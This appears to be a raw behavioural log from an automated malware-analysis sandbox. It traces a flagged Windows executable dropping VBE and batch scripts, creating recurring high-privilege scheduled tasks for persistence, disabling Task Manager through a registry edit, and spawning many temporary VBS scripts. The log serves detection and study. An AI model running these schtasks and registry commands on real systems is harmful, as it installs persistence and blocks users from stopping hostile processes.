            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: adKGhCOOzg.exe | ReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | File read: C:\Users\user\Desktop\adKGhCOOzg.exe
            Source: unknown | Process created: C:\Users\user\Desktop\adKGhCOOzg.exe "C:\Users\user\Desktop\adKGhCOOzg.exe"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe"
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknown | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: unknown | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: amsi.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: userenv.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: propsys.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: edputil.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: netutils.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: slc.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: sppc.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
